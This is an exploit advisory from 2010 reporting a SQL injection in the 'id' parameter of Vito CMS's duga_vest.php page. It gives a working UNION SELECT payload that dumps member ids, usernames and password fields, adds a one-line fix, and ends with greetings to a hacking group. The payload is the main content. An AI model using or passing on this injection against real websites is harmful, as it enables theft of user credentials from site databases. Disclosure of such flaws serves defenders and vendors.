# Exploit Title: Vito CMS SQL Injection Vulnerability # Date: 2010-02-11 # Author: hacker@sr.gov.yu # Software Link: http://kameleon-lab.com/vito-cms.php (it isn't download link, because it is not free) # Version: n/a #################################################################### .:. Author : hacker@sr.gov.yu .:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN) .:. Home : www.evilzone.org .:. Script : Vito CMS .:. Info link: http://kameleon-lab.com/vito-cms.php .:. Versions: ALL .:. Bug Type : Sql Injection .:. Risk: High .:. Tested on : Windows & Linux #################################################################### ===[ Exploit ]=== .:. It was found that Vito CMS does not validate properly the "id" parameter value. http://server/duga_vest.php?id=1[SQL] ===[ Example ]=== http://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members-- ===[ Solution ]=== .:. Input validation of "id" parameter should be corrected. Greetz to ALL EVILZONE.org members!!! Pozdrav za sve iz Srbije!!! :-)))